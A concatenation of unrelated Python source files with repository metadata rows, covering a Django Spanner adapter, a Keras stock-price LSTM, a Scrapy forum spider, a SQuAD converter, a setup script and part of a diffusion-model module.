def _convert_json_to_rst(infiles: str, outdir: str):
infile_list = utils.smart_filepaths(infiles)
outputdir = Path(outdir).absolute()
for thisfile in infile_list:
with open(thisfile) as f:
output = utils.render_page(thisfile, f.read())
utils.write_file(
Path.joinpath(
outputdir,
Path(thisfile).stem + ".rst"),
output
)
def _pivot(args: any):
"""
TODO: All this file wrangling should be offloaded
"""
pivot_headers = _parse_headers(args.pivot_headers)
infile_list = utils.smart_filepaths(args.infiles)
Pivot(
infile_list,
pivot_headers,
args.strict,
args.csv_out,
args.sort_by,
args.sort_order,
).pivot()
def _parse_headers(raw_headers: str) -> Set[str]:
"""
Args:
raw_headers (str): Value from args.pivot_headers.
Returns:
A Set of headers. This automatically discards duplicate headers.
"""
output = list()
for header in raw_headers.split(sep=","):
if header not in output: # Allow only unique headers
output.append(header.strip())
logging.debug("Pivoting JSON files using headers: {}".format(output))
return output
def cmd():
args = _cli()
logging.debug(args)
if not args.pivot:
_convert_json_to_rst(args.infiles, args.outdir)
else:
_pivot(args)
logging.debug("YOU HAVE REACHED THE END OF EARLY ACCESS CONTENT.")
| 23.836478
| 77
| 0.622164
|
4f4358c3f2bfb4eba389a9ed0317af4a2cd514b7
| 2,165
|
py
|
Python
|
GoogleStockPriceRNN.py
|
sd1998/GoogleStockPriceRNN
|
fb4da83ab3137d6c3eecfa3b964daa80ad9a8324
|
[
"Apache-2.0"
] | null | null | null |
GoogleStockPriceRNN.py
|
sd1998/GoogleStockPriceRNN
|
fb4da83ab3137d6c3eecfa3b964daa80ad9a8324
|
[
"Apache-2.0"
] | null | null | null |
GoogleStockPriceRNN.py
|
sd1998/GoogleStockPriceRNN
|
fb4da83ab3137d6c3eecfa3b964daa80ad9a8324
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset_train = pd.read_csv('Google_Stock_Price_Train.csv')
training_set = dataset_train.iloc[:, 1:2].values
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
training_set_scaled = sc.fit_transform(training_set)
X_train = []
y_train = []
for i in range(60, 1258):
X_train.append(training_set_scaled[i-60:i, 0])
y_train.append(training_set_scaled[i, 0])
X_train, y_train = np.array(X_train), np.array(y_train)
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
regressor = Sequential()
regressor.add(LSTM(units = 50, return_sequences = True, input_shape = (X_train.shape[1], 1)))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 50, return_sequences = True))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 50, return_sequences = True))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 50))
regressor.add(Dropout(0.2))
regressor.add(Dense(units = 1))
regressor.compile(optimizer = 'adam', loss = 'mean_squared_error')
regressor.fit(X_train, y_train, epochs = 100, batch_size = 32)
dataset_test = pd.read_csv('Google_Stock_Price_Test.csv')
real_stock_price = dataset_test.iloc[:, 1:2].values
dataset_total = pd.concat((dataset_train['Open'], dataset_test['Open']), axis = 0)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - 60:].values
inputs = inputs.reshape(-1,1)
inputs = sc.transform(inputs)
X_test = []
for i in range(60, 80):
X_test.append(inputs[i-60:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
predicted_stock_price = regressor.predict(X_test)
predicted_stock_price = sc.inverse_transform(predicted_stock_price)
plt.plot(real_stock_price, color = 'red', label = 'Real Google Stock Price')
plt.plot(predicted_stock_price, color = 'blue', label = 'Predicted Google Stock Price')
plt.title('Google Stock Price Prediction')
plt.xlabel('Time')
plt.ylabel('Google Stock Price')
plt.legend()
plt.show()
| 40.849057
| 93
| 0.757506
|
e21258a3eccf78fde0dfbc0bf8e9a764669b2a27
| 3,742
|
py
|
Python
|
django_spanner/functions.py
|
MShaffar19/python-spanner-django
|
62c22b113b470776cddacbab92c4428c6581c551
|
[
"BSD-3-Clause"
] | 1
|
2020-12-01T14:30:04.000Z
|
2020-12-01T14:30:04.000Z
|
django_spanner/functions.py
|
prakhargurunani/python-spanner-django
|
818324708e9ca46fbd80c47745bdf38e8a1a069c
|
[
"BSD-3-Clause"
] | 1
|
2021-02-23T12:32:32.000Z
|
2021-02-23T12:32:32.000Z
|
django_spanner/functions.py
|
prakhargurunani/python-spanner-django
|
818324708e9ca46fbd80c47745bdf38e8a1a069c
|
[
"BSD-3-Clause"
] | 1
|
2020-10-04T10:04:55.000Z
|
2020-10-04T10:04:55.000Z
|
# Copyright 2020 Google LLC
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
import math
from django.db.models.expressions import Func, Value
from django.db.models.functions import (
Cast,
Chr,
ConcatPair,
Cot,
Degrees,
Left,
Log,
Ord,
Pi,
Radians,
Right,
StrIndex,
Substr,
)
class IfNull(Func):
function = "IFNULL"
arity = 2
def cast(self, compiler, connection, **extra_context):
# Account for a field's max_length using SUBSTR.
max_length = getattr(self.output_field, "max_length", None)
if max_length is not None:
template = "SUBSTR(" + self.template + ", 0, %s)" % max_length
else:
template = self.template
return self.as_sql(
compiler, connection, template=template, **extra_context
)
def chr_(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="CODE_POINTS_TO_STRING([%(expressions)s])",
**extra_context
)
def concatpair(self, compiler, connection, **extra_context):
# Spanner's CONCAT function returns null if any of its arguments are null.
# Prevent that by converting null arguments to an empty string.
clone = self.copy()
clone.set_source_expressions(
IfNull(e, Value("")) for e in self.get_source_expressions()
)
return clone.as_sql(compiler, connection, **extra_context)
def cot(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="(1 / TAN(%(expressions)s))",
**extra_context
)
def degrees(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="((%%(expressions)s) * 180 / %s)" % math.pi,
**extra_context
)
def left_and_right(self, compiler, connection, **extra_context):
return self.get_substr().as_spanner(compiler, connection, **extra_context)
def log(self, compiler, connection, **extra_context):
# This function is usually Log(b, x) returning the logarithm of x to the
# base b, but on Spanner it's Log(x, b).
clone = self.copy()
clone.set_source_expressions(self.get_source_expressions()[::-1])
return clone.as_sql(compiler, connection, **extra_context)
def ord_(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="TO_CODE_POINTS(%(expressions)s)[OFFSET(0)]",
**extra_context
)
def pi(self, compiler, connection, **extra_context):
return self.as_sql(
compiler, connection, template=str(math.pi), **extra_context
)
def radians(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="((%%(expressions)s) * %s / 180)" % math.pi,
**extra_context
)
def strindex(self, compiler, connection, **extra_context):
return self.as_sql(
compiler, connection, function="STRPOS", **extra_context
)
def substr(self, compiler, connection, **extra_context):
return self.as_sql(
compiler, connection, function="SUBSTR", **extra_context
)
def register_functions():
Cast.as_spanner = cast
Chr.as_spanner = chr_
ConcatPair.as_spanner = concatpair
Cot.as_spanner = cot
Degrees.as_spanner = degrees
Left.as_spanner = left_and_right
Log.as_spanner = log
Ord.as_spanner = ord_
Pi.as_spanner = pi
Radians.as_spanner = radians
Right.as_spanner = left_and_right
StrIndex.as_spanner = strindex
Substr.as_spanner = substr
| 26.167832
| 78
| 0.663014
|
a83383c3006bb95b83fd1f186c757cf42753c4c3
| 3,299
|
py
|
Python
|
breakdown/templatetags.py
|
Goldmund-Wyldebeast-Wunderliebe/jinja-breakdown
|
c6296d54ea6c9f1185039cab7495d5833ba6437f
|
[
"Apache-2.0"
] | 1
|
2020-08-04T04:51:28.000Z
|
2020-08-04T04:51:28.000Z
|
breakdown/templatetags.py
|
Goldmund-Wyldebeast-Wunderliebe/jinja-breakdown
|
c6296d54ea6c9f1185039cab7495d5833ba6437f
|
[
"Apache-2.0"
] | null | null | null |
breakdown/templatetags.py
|
Goldmund-Wyldebeast-Wunderliebe/jinja-breakdown
|
c6296d54ea6c9f1185039cab7495d5833ba6437f
|
[
"Apache-2.0"
] | null | null | null |
"""
Breakdown.py - 2011 Concentric Sky
Lightweight jinja2 template prototyping server with support for
some custom template tags
Copyright 2011 Concentric Sky, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import six
import breakdown
from breakdown.settings import STATIC_URL
import jinja2
import markupsafe
import os
import random
__all__ = ["image", "greeking"]
Markup = markupsafe.Markup
min_func = min
max_func = max
env = jinja2.Environment()
def image(cache_path, width, height):
""" Generate a custom-sized sample image """
# Create unique path
size = (width, height)
filename = "%sx%s.png" % (width, height)
path = os.path.join(cache_path, filename)
# Check if image has already been created
if not os.path.exists(path):
# Generate new image
sample = breakdown.pkg_path("img/sample.png")
if not os.path.exists(sample):
return Markup(u"<img/>")
else:
try:
# Try scaling the image using PIL
from PIL import Image
source = Image.open(sample)
scaled = source.resize(size, Image.BICUBIC)
scaled.save(path)
except ImportError:
# If we couldnt find PIL, just copy the image
inf = open(sample, "rb")
outf = open(path, "wb")
outf.write(inf.read())
return Markup(u'<img src="%s%s">' % (STATIC_URL, filename))
def greeking(mode=None, min=50, max=100):
""" Generate a block of various HTML text """
# Get a blob of lipsum
minimum = max_func(min, 6 * 4)
maximum = max_func(max, minimum + 1)
blob = env.globals["lipsum"](html=False, n=1, min=minimum, max=maximum).split(" ")
# Wrap text in HTML elements at random points
wrappers = [
("<strong>", "</strong>"),
("<em>", "</em>"),
("<code>", "</code>"),
('<a href="#">', "</a>"),
]
random.shuffle(wrappers)
thresh = 5
pointers = random.sample(range(len(blob) / thresh), len(wrappers))
for i, ptr in enumerate(pointers):
ptr = ptr * thresh
length = random.randint(2, thresh)
blob[ptr] = wrappers[i][0] + blob[ptr]
blob[ptr + length] = wrappers[i][1] + blob[ptr + length]
html = "<p>" + " ".join(blob) + "</p>"
# Generate random lists
lists = []
for type in ("ul", "ol"):
items = []
for i in range(random.randint(3, 4)):
items.append(
"<li>%s</li>" % env.globals["lipsum"](html=False, n=1, min=5, max=10)
)
lists.append(items)
html += """
<ul>
%s
</ul>
<ol>
%s
</ol>
""" % (
"\n".join(lists[0]),
"\n".join(lists[1]),
)
return Markup(six.text_type(html))
| 28.196581
| 86
| 0.593816
|
c2a3d179dc713d65a8a409b53318592e3fa46b76
| 1,888
|
py
|
Python
|
forum_tag/forum_tag/spiders/search_spider.py
|
chrisfromthelc/wpcom-forum-scraper
|
82d123f243c6830c2529a5fdfadffccef4975e36
|
[
"BSD-3-Clause"
] | null | null | null |
forum_tag/forum_tag/spiders/search_spider.py
|
chrisfromthelc/wpcom-forum-scraper
|
82d123f243c6830c2529a5fdfadffccef4975e36
|
[
"BSD-3-Clause"
] | 1
|
2022-03-02T14:53:20.000Z
|
2022-03-02T14:53:20.000Z
|
forum_tag/forum_tag/spiders/search_spider.py
|
chrisfromthelc/wpcom-forum-scraper
|
82d123f243c6830c2529a5fdfadffccef4975e36
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
class TagSpiderSpider(scrapy.Spider):
name = 'tag_spider'
allowed_domains = ["wordpress.com"]
start_urls = ['https://wordpress.com/forums/topic-tag/seo/'] # edit this URL for the tag URL you want
custom_settings = {'CLOSESPIDER_PAGECOUNT': 100}
def parse(self, response):
# follow links to topic pages
for href in response.css('a.jetpack-instant-search__search-result-title-link::attr(href)'):
yield response.follow(href, self.parse_topic)
#follow pagination links
for href in response.css('.bbp-pagination-links a.next::attr(href)'):
yield response.follow(href, self.parse)
# next_page = response.css('.nav a.next::attr(href)').extract_first()
# if next_page is not None:
# yield response.follow(next_page, callback=self.parse)
def parse_topic(self, response):
def extract_first_with_css(query):
return response.css(query).extract_first().strip()
def extract_with_xpath(query):
return response.xpath(query).extract()
# for post in response:
#
# item = {}
#
# item['topic_title'] = extract_first_with_css('h1::text').replace("\xa0", " ")
# item['topic_url'] = response.request.url
# item['topic_messages_text'] = ''.join(extract_with_xpath('//div[@class="bbp-reply-content"]/p/text()')).replace("\n", " ").replace("\xa0", " ")
#
# return item
yield {
'topic_title': extract_first_with_css('h1::text').replace("\xa0", " "),
'topic_url': response.request.url,
'topic_messages_text': ' '.join(extract_with_xpath('//div[@class="bbp-reply-content"]/p/text()')).replace("\n", " ").replace("\xa0", " ")
}
pass
| 38.530612
| 161
| 0.587924
|
59e061169fa08b5f0a419e3a4899b6b0f6d11573
| 6,820
|
py
|
Python
|
tools/accuracy_checker/accuracy_checker/annotation_converters/squad_emb.py
|
APrigarina/open_model_zoo
|
b1ff98b64a6222cf6b5f3838dc0271422250de95
|
[
"Apache-2.0"
] | 1,031
|
2020-07-16T08:30:57.000Z
|
2022-03-30T19:42:52.000Z
|
tools/accuracy_checker/accuracy_checker/annotation_converters/squad_emb.py
|
APrigarina/open_model_zoo
|
b1ff98b64a6222cf6b5f3838dc0271422250de95
|
[
"Apache-2.0"
] | 966
|
2020-07-16T08:13:00.000Z
|
2022-03-31T18:09:18.000Z
|
tools/accuracy_checker/accuracy_checker/annotation_converters/squad_emb.py
|
APrigarina/open_model_zoo
|
b1ff98b64a6222cf6b5f3838dc0271422250de95
|
[
"Apache-2.0"
] | 440
|
2020-07-16T12:52:50.000Z
|
2022-03-31T14:21:41.000Z
|
"""
Copyright (c) 2018-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import multiprocessing
import unicodedata
import string
import numpy as np
from ..representation import QuestionAnsweringEmbeddingAnnotation
from ..utils import read_json
from ..config import PathField, NumberField, BoolField
from .format_converter import BaseFormatConverter, ConverterReturn
# split word by vocab items and get tok codes
# iterativly return codes
def encode_by_voc(w, vocab):
# remove mark and control chars
def clean_word(w):
wo = "" # accumulator for output word
for c in unicodedata.normalize("NFD", w):
c_cat = unicodedata.category(c)
# remove mark nonspacing code and controls
if c_cat != "Mn" and c_cat[0] != "C":
wo += c
return wo
w = clean_word(w)
res = []
for s0, e0 in split_to_words(w):
s, e = s0, e0
tokens = []
while e > s:
subword = w[s:e] if s == s0 else "##" + w[s:e]
if subword in vocab:
tokens.append(vocab[subword])
s, e = e, e0
else:
e -= 1
if s < e0:
tokens = [vocab['[UNK]']]
res.extend(tokens)
return res
#split big text into words by spaces
#iterativly return words
def split_to_words(text):
prev_is_sep = True # mark initial prev as space to start word from 0 char
for i, c in enumerate(text + " "):
is_punc = (c in string.punctuation or unicodedata.category(c)[0] == "P")
cur_is_sep = (c.isspace() or is_punc)
if prev_is_sep != cur_is_sep:
if prev_is_sep:
start = i
else:
yield start, i
del start
if is_punc:
yield i, i+1
prev_is_sep = cur_is_sep
# get big text and return list of token id and start-end positions for each id in original texts
def text_to_tokens(text, vocab_or_tokenizer):
tokens_id = []
tokens_se = []
for s, e in split_to_words(text):
if hasattr(vocab_or_tokenizer, 'encode'):
#vocab_or_tokenizer is tokenizer
toks = vocab_or_tokenizer.encode(text[s:e], add_special_tokens=False)
else:
#vocab_or_tokenizer is tokens dictionary
toks = encode_by_voc(text[s:e], vocab_or_tokenizer)
for tok in toks:
tokens_id.append(tok)
tokens_se.append((s, e))
return tokens_id, tokens_se
def encode_squad_article(article, vocab, do_lower_case):
def encode_txt(txt):
if do_lower_case:
txt = txt.lower()
return text_to_tokens(txt, vocab)
for par in article['paragraphs']:
par['context_enc'], par['context_enc_pos'] = encode_txt(par['context'])
for qa in par['qas']:
qa['question_enc'], qa['question_enc_pos'] = encode_txt(qa['question'])
return article
class SQUADConverterEMB(BaseFormatConverter):
__provider__ = "squad_emb"
annotation_types = (QuestionAnsweringEmbeddingAnnotation, )
@classmethod
def parameters(cls):
configuration_parameters = super().parameters()
configuration_parameters.update({
'testing_file': PathField(description="Path to testing file."),
'vocab_file': PathField(description='Path to vocabulary file.'),
'max_seq_length': NumberField(
description='The maximum total input sequence length after WordPiece tokenization.',
optional=True, default=128, value_type=int
),
'max_query_length': NumberField(
description='The maximum number of tokens for the question.',
optional=True, default=64, value_type=int
),
'lower_case': BoolField(optional=True, default=False, description='Switch tokens to lower case register')
})
return configuration_parameters
def configure(self):
self.testing_file = self.get_value_from_config('testing_file')
self.max_seq_length = int(self.get_value_from_config('max_seq_length'))
self.max_query_length = self.get_value_from_config('max_query_length')
self.lower_case = self.get_value_from_config('lower_case')
vocab_file = str(self.get_value_from_config('vocab_file'))
with open(vocab_file, "r", encoding="utf-8") as r:
self.vocab = {t.rstrip("\n"): i for i, t in enumerate(r.readlines())}
def convert(self, check_content=False, progress_callback=None, progress_interval=100, **kwargs):
squad = read_json(self.testing_file)
N = len(squad['data'])
with multiprocessing.Pool() as pool:
squad['data'] = pool.starmap(
encode_squad_article,
zip(squad['data'], [self.vocab] * N, [self.lower_case] * N)
)
pad = [self.vocab["[PAD]"]]
cls = [self.vocab["[CLS]"]]
sep = [self.vocab["[SEP]"]]
index_ref = [0]
def add_sample(ids, max_len, context_pos_id, annotations):
ids_len = min(max_len - 2, len(ids))
ids = ids[:ids_len]
rest = max_len - (ids_len + 2)
assert rest >= 0
annotations.append(QuestionAnsweringEmbeddingAnnotation(
['{}_{}'.format(n, index_ref[0]) for n in ('input_ids', 'input_mask', 'segment_ids', 'position_ids')],
np.array(cls + ids + sep + pad * rest),
np.array([1] * (1 + ids_len + 1) + pad * rest),
np.array([0] * (1 + ids_len + 1) + pad * rest),
np.arange(max_len),
context_pos_id
))
index_ref[0] += 1
c_annos = []
q_annos = []
for article in squad['data']:
for par in article['paragraphs']:
add_sample(
par['context_enc'],
self.max_seq_length,
None,
c_annos)
for qa in par['qas']:
add_sample(
qa['question_enc'],
self.max_query_length,
c_annos[-1].identifier,
q_annos)
return ConverterReturn(c_annos+q_annos, None, None)
| 35.520833
| 118
| 0.596481
|
ec08c455d9f40119cd7d9791e94ecd98206f4975
| 847
|
py
|
Python
|
skfem/element/element_quad/element_quad1.py
|
YerbaPage/scikit-fem
|
e5140e0648e4a0f1ea0b60de90851ab49d369453
|
[
"BSD-3-Clause"
] | null | null | null |
skfem/element/element_quad/element_quad1.py
|
YerbaPage/scikit-fem
|
e5140e0648e4a0f1ea0b60de90851ab49d369453
|
[
"BSD-3-Clause"
] | null | null | null |
skfem/element/element_quad/element_quad1.py
|
YerbaPage/scikit-fem
|
e5140e0648e4a0f1ea0b60de90851ab49d369453
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from ..element_h1 import ElementH1
from ...mesh.mesh2d import MeshQuad
class ElementQuad1(ElementH1):
nodal_dofs = 1
dim = 2
maxdeg = 2
dofnames = ['u']
doflocs = np.array([[0., 0.],
[1., 0.],
[1., 1.],
[0., 1.]])
mesh_type = MeshQuad
def lbasis(self, X, i):
x, y = X
if i == 0:
phi = (1. - x) * (1. - y)
dphi = np.array([-1. + y, -1. + x])
elif i == 1:
phi = x * (1. - y)
dphi = np.array([1. - y, -x])
elif i == 2:
phi = x * y
dphi = np.array([y, x])
elif i == 3:
phi = (1. - x) * y
dphi = np.array([-y, 1. - x])
else:
self._index_error()
return phi, dphi
| 22.289474
| 47
| 0.378985
|
778e7c20944ec3673b761010e0bded567b235394
| 644
|
py
|
Python
|
client/checkout/tests/test_models.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | 6
|
2019-11-21T10:09:49.000Z
|
2021-06-19T09:52:59.000Z
|
client/checkout/tests/test_models.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
client/checkout/tests/test_models.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.test import TestCase, RequestFactory
# models test
class UserProfileTest(TestCase):
"""
Test whether user profile is created after user creation
"""
def setUp(self):
# Every test needs access to the request factory.
self.request = RequestFactory().get("/")
# create a user instance
self.user = get_user_model().objects.create_user(
username='john',
email='johndoe@gmail.com',
password='password'
)
def test_create_userprofile(self):
self.assertIsNotNone(self.user.userprofile)
| 28
| 60
| 0.656832
|
97650773dfeda2d22c5ef85e68c07b2233eb467b
| 2,123
|
py
|
Python
|
setup.py
|
CAM-Gerlach/ivaldi
|
07fa74ac328d3caae6e1e9811f649178eda01925
|
[
"MIT"
] | null | null | null |
setup.py
|
CAM-Gerlach/ivaldi
|
07fa74ac328d3caae6e1e9811f649178eda01925
|
[
"MIT"
] | null | null | null |
setup.py
|
CAM-Gerlach/ivaldi
|
07fa74ac328d3caae6e1e9811f649178eda01925
|
[
"MIT"
] | 1
|
2020-02-18T04:40:06.000Z
|
2020-02-18T04:40:06.000Z
|
#!/usr/bin/env python3
"""
Setup script for Ivaldi.
"""
# Standard library imports
from pathlib import Path
# Third party imports
import setuptools
PROJECT_NAME = "ivaldi"
with open(Path(__file__).resolve().parent / "README.md",
"r", encoding="utf-8") as readme_file:
LONG_DESCRIPTION = readme_file.read()
VERSION = {}
with open(Path(__file__).resolve().parent
/ "src" / PROJECT_NAME / "_version.py",
"r", encoding="utf-8") as version_file:
exec(version_file.read(), VERSION) # pylint: disable=W0122
setuptools.setup(
name=PROJECT_NAME,
version=VERSION["__version__"],
author="C.A.M. Gerlach",
author_email="CAM.Gerlach@Gerlach.CAM",
description=("A lightweight client for IoT data logging and uplink."),
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
keywords="iot sensor remote control research m2m raspberry pi adafruit",
url="https://github.com/hamma-dev/ivaldi",
packages=setuptools.find_packages("src"),
package_dir={"": "src"},
python_requires=">=3.6",
install_requires=[
"adafruit-circuitpython-ads1x15",
"adafruit-circuitpython-bmp280",
"adafruit-circuitpython-sht31d",
"gpiozero",
"pyserial",
"RPi.GPIO",
],
entry_points={
"console_scripts": [
f"{PROJECT_NAME}={PROJECT_NAME}.__main__:main"]
},
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Environment :: No Input/Output (Daemon)",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering :: Atmospheric Science",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: System :: Monitoring",
"Topic :: System :: Networking :: Monitoring :: Hardware Watchdog",
],
)
| 31.220588
| 76
| 0.628356
|
1b032d7df048e879cb131d3ededb5f240f3327c2
| 1,266
|
py
|
Python
|
db_tutorial.py
|
Gerard-007/diaryApp
|
2245cb2c6cca763112f68aba1ac1f7d7ebccd9b7
|
[
"MIT"
] | null | null | null |
db_tutorial.py
|
Gerard-007/diaryApp
|
2245cb2c6cca763112f68aba1ac1f7d7ebccd9b7
|
[
"MIT"
] | null | null | null |
db_tutorial.py
|
Gerard-007/diaryApp
|
2245cb2c6cca763112f68aba1ac1f7d7ebccd9b7
|
[
"MIT"
] | null | null | null |
from peewee import *
db = SqliteDatabase("students.db")
class Student(Model):
username = CharField(max_length=255, unique=True)
points = IntegerField(default=0)
class Meta:
database = db
#user inputs stores as dictionary...
students = [
{'username': 'Gerard',
'points': 2000},
{'username': 'Blessing',
'points': 1200},
{'username': 'StefNora',
'points': 3000},
{'username': 'Luke',
'points': 2300}
]
def add_students():
for student in students:
try:
Student.create(username = student['username'],
points = student['points'])
except IntegrityError:
student_record = Student.get(username=student['username'])
student_record.points = student['points']
student_record.save()
def top_student():
#Select all student record, order them by highest point, get only the 1st record
student = Student.select().order_by(Student.points.desc()).get()
return student.username
#This block runs the program logics
if __name__ == '__main__':
db.connect()
db.create_tables([Student], safe=True)
add_students()
print("The top student now is: {}".format(top_student()))
| 26.375
| 85
| 0.611374
|
d52f3bcf4e4d1093fc0e3387a628fa0b55258166
| 840
|
py
|
Python
|
core/frontend/migrations/0001_initial.py
|
LegolasVzla/django-rest-framework-orientdb-postgresql
|
e7c412bd905a91210bfe863f31fea9ec78fe830e
|
[
"MIT"
] | 2
|
2019-06-26T12:33:32.000Z
|
2019-06-26T21:22:10.000Z
|
core/frontend/migrations/0001_initial.py
|
LegolasVzla/django-rest-framework-orientdb-postgresql
|
e7c412bd905a91210bfe863f31fea9ec78fe830e
|
[
"MIT"
] | 6
|
2019-12-04T22:58:04.000Z
|
2022-02-10T13:17:09.000Z
|
core/frontend/migrations/0001_initial.py
|
LegolasVzla/django-rest-framework-orientdb-postgresql
|
e7c412bd905a91210bfe863f31fea9ec78fe830e
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.1 on 2019-06-06 20:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500)),
('email', models.CharField(blank=True, max_length=500)),
('is_active', models.BooleanField(default=True)),
('is_deleted', models.BooleanField(default=False)),
('created_date', models.DateTimeField(auto_now_add=True)),
('updated_date', models.DateTimeField(auto_now=True)),
],
),
]
| 31.111111
| 114
| 0.583333
|
fe24fa6a6769a9b1801bf76760dbe392386f6963
| 15,181
|
py
|
Python
|
ddpm/src/modules/models1.py
|
an-seunghwan/generative
|
edba5999677e80178f0a3ecd091f1800396ebcef
|
[
"MIT"
] | 6
|
2021-06-02T04:48:20.000Z
|
2022-02-02T10:19:07.000Z
|
ddpm/src/modules/models1.py
|
an-seunghwan/generative
|
edba5999677e80178f0a3ecd091f1800396ebcef
|
[
"MIT"
] | null | null | null |
ddpm/src/modules/models1.py
|
an-seunghwan/generative
|
edba5999677e80178f0a3ecd091f1800396ebcef
|
[
"MIT"
] | null | null | null |
#%%
'''
Fixed:
tfa.layers.GroupNormalization(1) -> layers.LayerNormalization()
'''
#%%
import tensorflow as tf
import tensorflow.keras as K
from tensorflow.keras import layers
import numpy as np
# import tensorflow_addons as tfa
#%%
# def nonlinearity(x):
# return tf.nn.swish(x)
#%%
# # FIXME
# def normalize(x):
# return tfa.layers.GroupNormalization(1)(x)
# return layers.LayerNormalization()(x)
#%%
class Upsampling(layers.Layer):
def __init__(self, in_ch, with_conv):
super(Upsampling, self).__init__()
self.in_ch = in_ch
self.with_conv = with_conv
self.conv = layers.Conv2D(filters=self.in_ch, kernel_size=3, strides=1, padding='same', name='conv_up')
def call(self, x, **kwargs):
B, H, W, C = x.shape
x = tf.image.resize(x, size=[H * 2, W * 2], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
# assert x.shape == [B, H * 2, W * 2, C]
if self.with_conv:
x = self.conv(x)
# assert x.shape == [B, H * 2, W * 2, C]
return x
#%%
class Downsampling(layers.Layer):
def __init__(self, in_ch, with_conv):
super(Downsampling, self).__init__()
self.in_ch = in_ch
self.with_conv = with_conv
if self.with_conv:
self.conv = layers.Conv2D(filters=self.in_ch, kernel_size=3, strides=2, padding='same', name='conv_down')
else:
self.avgpool = layers.AveragePooling2D(pool_size=(2, 2), strides=2)
def call(self, x, **kwargs):
# B, H, W, C = x.shape
if self.with_conv:
x = self.conv(x)
else:
x = self.avgpool(x)
# assert x.shape == [B, H // 2, W // 2, C]
return x
#%%
def get_timestep_embedding(timesteps, embedding_dim):
"""
From Fairseq.
Build sinusoidal embeddings.
This matches the implementation in tensor2tensor, but differs slightly
from the description in Section 3.5 of "Attention Is All You Need".
"""
assert len(timesteps.shape) == 1 # and timesteps.dtype == tf.int32
half_dim = embedding_dim // 2
emb = tf.math.log(10000.0) / (half_dim - 1)
emb = tf.exp(tf.range(half_dim, dtype=tf.float32) * -emb)
emb = tf.cast(timesteps, dtype=tf.float32)[:, None] * emb[None, :]
emb = tf.concat([tf.sin(emb), tf.cos(emb)], axis=1)
if embedding_dim % 2 == 1: # zero pad
emb = tf.pad(emb, [[0, 0], [0, 1]])
# assert emb.shape == [timesteps.shape[0], embedding_dim]
return emb
#%%
class ResnetBlock(layers.Layer):
def __init__(self, dropout, in_ch, out_ch=None):
super(ResnetBlock, self).__init__()
self.dropout = dropout
self.in_ch = in_ch
self.out_ch = out_ch
if self.out_ch is None:
self.out_ch = self.in_ch
if self.out_ch != self.in_ch:
self.shortcut = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv_shortcut')
# self.nonlinearity = nonlinearity
# self.normalize1 = tfa.layers.GroupNormalization(1)
# self.normalize2 = tfa.layers.GroupNormalization(1)
self.normalize1 = layers.LayerNormalization()
self.normalize2 = layers.LayerNormalization()
self.conv1 = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv1')
self.temb_proj = layers.Dense(self.out_ch, name='temb_proj')
self.dropout_layer = layers.Dropout(rate=self.dropout)
self.conv2 = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv2')
def call(self, x, temb, **kwargs):
h = x
h = tf.nn.swish(self.normalize1(h))
h = self.conv1(h)
# add in timestep embedding
h += self.temb_proj(tf.nn.swish(temb))[:, None, None, :]
h = tf.nn.swish(self.normalize2(h))
h = self.dropout_layer(h)
h = self.conv2(h)
if self.out_ch != self.in_ch:
x = self.shortcut(x)
